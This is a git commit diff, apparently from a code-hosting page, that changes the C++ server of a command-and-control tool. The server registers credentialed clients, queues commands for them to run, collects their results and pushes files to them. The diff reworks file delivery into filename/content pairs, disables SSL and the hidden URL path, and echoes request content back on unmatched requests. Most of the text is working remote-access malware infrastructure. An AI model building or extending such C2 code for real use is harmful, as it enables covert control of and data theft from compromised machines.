Improved file upload functionality and changed credentials
This commit is contained in:
parent
4e894dc2ad
commit
1f2ffe314a
|
@ -93,15 +93,30 @@ std::map<std::string, std::string> createUserComms(std::vector<std::vector<std::
|
||||||
return mComms; // return the map
|
return mComms; // return the map
|
||||||
}
|
}
|
||||||
|
|
||||||
|
std::map<std::string, std::pair<std::string, std::string>> createUserFiles(std::vector<std::vector<std::string>> sCreds) // creates a dictionary containing the username of the registered client
|
||||||
|
// as the key and an empty string pair for later use
|
||||||
|
{
|
||||||
|
std::map<std::string, std::pair<std::string, std::string>> mComms; // define mComms, a map containing string as the key and value
|
||||||
|
|
||||||
|
for (int iUsernameIndex = 0; iUsernameIndex < sCreds[0].size(); iUsernameIndex++) // for each username in the list of credentials
|
||||||
|
{
|
||||||
|
mComms[sCreds[0][iUsernameIndex]].first = ""; // set the value of the username to an empty string
|
||||||
|
mComms[sCreds[0][iUsernameIndex]].second = ""; // set the value of the username to an empty string
|
||||||
|
}
|
||||||
|
return mComms; // return the map
|
||||||
|
}
|
||||||
|
|
||||||
std::map<std::string, std::string> mCommands = createUserComms(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of strings to
|
std::map<std::string, std::string> mCommands = createUserComms(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of strings to
|
||||||
// mCommands
|
// mCommands
|
||||||
|
|
||||||
std::map<std::string, std::string> mResults = createUserComms(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of string to
|
std::map<std::string, std::string> mResults = createUserComms(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of string to
|
||||||
// mResults
|
// mResults
|
||||||
|
|
||||||
std::map<std::string, std::string> mInFiles = createUserComms(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of string to mInFiles
|
std::map<std::string, std::pair<std::string, std::string>> mInFiles =
|
||||||
|
createUserFiles(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of string to mOutFiles
|
||||||
|
|
||||||
std::map<std::string, std::string> mOutFiles = createUserComms(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of string to mOutFiles
|
std::map<std::string, std::pair<std::string, std::string>> mOutFiles =
|
||||||
|
createUserFiles(sCreds); // call the createUserComms function with the 2d vector sCreds as an argument, saving the returned map of string to mOutFiles
|
||||||
|
|
||||||
std::map<std::string, bool> mConnections = createUserConnections(sCreds); // call the defaultUserConnections function with the 2d vector sCreds as an argument, saving the returned map of
|
std::map<std::string, bool> mConnections = createUserConnections(sCreds); // call the defaultUserConnections function with the 2d vector sCreds as an argument, saving the returned map of
|
||||||
// string and bool to mConnections
|
// string and bool to mConnections
|
||||||
|
@ -151,12 +166,12 @@ class command_and_control : public httpserver::http_resource // class for comma
|
||||||
{
|
{
|
||||||
if (req.get_arg("msg") == "ready") // if the client is initiating a connection
|
if (req.get_arg("msg") == "ready") // if the client is initiating a connection
|
||||||
{
|
{
|
||||||
std::ostringstream oss; // declare ostringstream oss for response creation
|
std::ostringstream oss; // declare ostringstream oss for response creation
|
||||||
oss << "user=" << req.get_user() << "&msg=acknowledged"; // add specific response for client to confirm connection has been established
|
oss << "msg=acknowledged"; // add specific response for client to confirm connection has been established
|
||||||
std::string sResponse = oss.str(); // convert oss to string
|
std::string sResponse = oss.str(); // convert oss to string
|
||||||
bIncomingHey = true; // set the bIncomingHey flag to true
|
bIncomingHey = true; // set the bIncomingHey flag to true
|
||||||
sIncomingHeyUser = req.get_user(); // set the sIncomingHeyUser string to the value of the username used by the client
|
sIncomingHeyUser = req.get_user(); // set the sIncomingHeyUser string to the value of the username used by the client
|
||||||
mConnections[req.get_user()] = true; // set the connection value of the user in question to true
|
mConnections[req.get_user()] = true; // set the connection value of the user in question to true
|
||||||
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(sResponse)); // return the generated response to the client
|
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(sResponse)); // return the generated response to the client
|
||||||
}
|
}
|
||||||
else if (req.get_arg("msg") == "reqcmd") // if the client is requesting a command from the server
|
else if (req.get_arg("msg") == "reqcmd") // if the client is requesting a command from the server
|
||||||
|
@ -168,10 +183,10 @@ class command_and_control : public httpserver::http_resource // class for comma
|
||||||
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(oss.str())); // return the generated response to the client
|
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(oss.str())); // return the generated response to the client
|
||||||
}
|
}
|
||||||
|
|
||||||
else if (mOutFiles[req.get_user()] != "") // if there is a file waiting to be downloaded from the server
|
else if (mOutFiles[req.get_user()].first != "") // if there is a file waiting to be downloaded from the server
|
||||||
{
|
{
|
||||||
std::ostringstream oss; // declare ostringstream for response creation
|
std::ostringstream oss; // declare ostringstream for response creation
|
||||||
oss << "out=" << mOutFiles[req.get_user()]; // add filename and file content to the oss
|
oss << "filename=" << mOutFiles[req.get_user()].first << "&content=" << mOutFiles[req.get_user()].second; // add filename and file content to the oss
|
||||||
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(oss.str())); // return the generated response to the client
|
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(oss.str())); // return the generated response to the client
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -184,27 +199,28 @@ class command_and_control : public httpserver::http_resource // class for comma
|
||||||
else if (req.get_arg("msg") == "saved")
|
else if (req.get_arg("msg") == "saved")
|
||||||
{
|
{
|
||||||
std::cout << "Client " << req.get_user() << " successfully saved the file." << std::endl;
|
std::cout << "Client " << req.get_user() << " successfully saved the file." << std::endl;
|
||||||
mOutFiles[req.get_user()] = "";
|
mOutFiles[req.get_user()].first = "";
|
||||||
|
mOutFiles[req.get_user()].second = "";
|
||||||
}
|
}
|
||||||
|
|
||||||
else if (req.get_arg("msg") == "error")
|
else if (req.get_arg("msg") == "error")
|
||||||
{
|
{
|
||||||
std::cout << "Client " << req.get_user() << " encountered an error whilst saving the file." << std::endl;
|
std::cout << "Client " << req.get_user() << " encountered an error whilst saving the file." << std::endl;
|
||||||
mOutFiles[req.get_user()] = "";
|
mOutFiles[req.get_user()].first = "";
|
||||||
|
mOutFiles[req.get_user()].second = "";
|
||||||
}
|
}
|
||||||
|
|
||||||
else if (req.get_arg("result") != "") // if the client has submitted a result from a command
|
else if (req.get_arg("result") != "") // if the client has submitted a result from a command
|
||||||
{
|
{
|
||||||
mCommands[req.get_user()] = ""; // the value for the client in the mCommands map should be set to empty
|
mCommands[req.get_user()] = ""; // the value for the client in the mCommands map wil be set to empty
|
||||||
mResults[req.get_user()] = req.get_arg("result"); // the value for the cleit in the mResults map should be set to the returned result
|
mResults[req.get_user()] = req.get_arg("result"); // the value for the client in the mResults map will be set to the returned result
|
||||||
std::ostringstream oss; // declare osstringstream oss for response creation
|
std::ostringstream oss; // declare osstringstream oss for response creation
|
||||||
oss << "user=" << req.get_user() << "&msg=acknowledged"; // add specific response for client to confirm that the result from the command was recieved
|
oss << "msg=acknowledged"; // add specific response for client to confirm that the result from the command was recieved
|
||||||
std::string sResponse = oss.str(); // convert oss to string
|
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(oss.str())); // return the generated response to the client
|
||||||
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(sResponse)); // return the generated response to the client
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response("Not found")); // otherwise return not found
|
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(req.get_content())); // otherwise return not found
|
||||||
}
|
}
|
||||||
};
|
};
|
||||||
|
|
||||||
|
@ -237,7 +253,8 @@ bool uploadFile(std::string sFilename, std::string sUsername)
|
||||||
|
|
||||||
if (sContent != "") // if the file was successfully read
|
if (sContent != "") // if the file was successfully read
|
||||||
{
|
{
|
||||||
mOutFiles[sUsername] = sContent; // then set the value of the username key in the mOutFiles map to the parsed content of the file
|
mOutFiles[sUsername].first = sFilename; // then set the value of the username key in the mOutFiles map to the parsed content of the file
|
||||||
|
mOutFiles[sUsername].second = sContent; // then set the value of the second value for username key in the mOutFiles map to the parsed content of the file
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
else // otherwise
|
else // otherwise
|
||||||
|
@ -301,7 +318,7 @@ void interactConnection(std::string sIdentifier) // begin issuing commands to t
|
||||||
if (bResult) // if the uploadFile function returned true
|
if (bResult) // if the uploadFile function returned true
|
||||||
{
|
{
|
||||||
std::cout << "Command sent, awaiting response..." << std::endl; // tell the user that the command has been added to the queue and is awaiting a response
|
std::cout << "Command sent, awaiting response..." << std::endl; // tell the user that the command has been added to the queue and is awaiting a response
|
||||||
while (!mOutFiles[sIdentifier].empty()) // whilst the file has not been removed from the mOutFiles array
|
while (mOutFiles[sIdentifier].first != "") // whilst the file has not been removed from the mOutFiles array
|
||||||
{
|
{
|
||||||
continue; // do nothing and block further execution
|
continue; // do nothing and block further execution
|
||||||
}
|
}
|
||||||
|
@ -411,13 +428,15 @@ void prompt()
|
||||||
|
|
||||||
int main(int argc, char **argv)
|
int main(int argc, char **argv)
|
||||||
{
|
{
|
||||||
command_and_control c2; // instanciate the command and control class
|
command_and_control c2; // instanciate the command and control class
|
||||||
httpserver::webserver ws = httpserver::create_webserver(8665).use_ssl().https_mem_key("server.key").https_mem_cert("server.crt"); // create the webserver, ensuring ssl is enabled and
|
httpserver::webserver ws = httpserver::create_webserver(8665); //.use_ssl().https_mem_key("server.key").https_mem_cert("server.crt"); // create the webserver, ensuring ssl is enabled and
|
||||||
// the server is using the provided crt and key
|
// the server is using the provided crt and key
|
||||||
ws.register_resource("/YVDvOraEcGwPAyjuBFzGespbRzifTpi", &c2); // register the c2 resource at a randomly generated URL
|
ws.register_resource("/", &c2); // register the c2 resource at a randomly generated URL
|
||||||
ws.start(false); // start the webserver in non-blocking mode
|
// ws.register_resource("/YVDvOraEcGwPAyjuBFzGespbRzifTpi", &c2); // register the c2 resource at a randomly generated
|
||||||
std::thread tCheck(checkConnections); // run checkConnections in a new thread
|
// URL
|
||||||
prompt(); // run the interactive prompt
|
ws.start(false); // start the webserver in non-blocking mode
|
||||||
tCheck.join(); // after the prompt has exited, wait for the checkConnections thread to end
|
std::thread tCheck(checkConnections); // run checkConnections in a new thread
|
||||||
|
prompt(); // run the interactive prompt
|
||||||
|
tCheck.join(); // after the prompt has exited, wait for the checkConnections thread to end
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
Binary file not shown.
Loading…
Reference in New Issue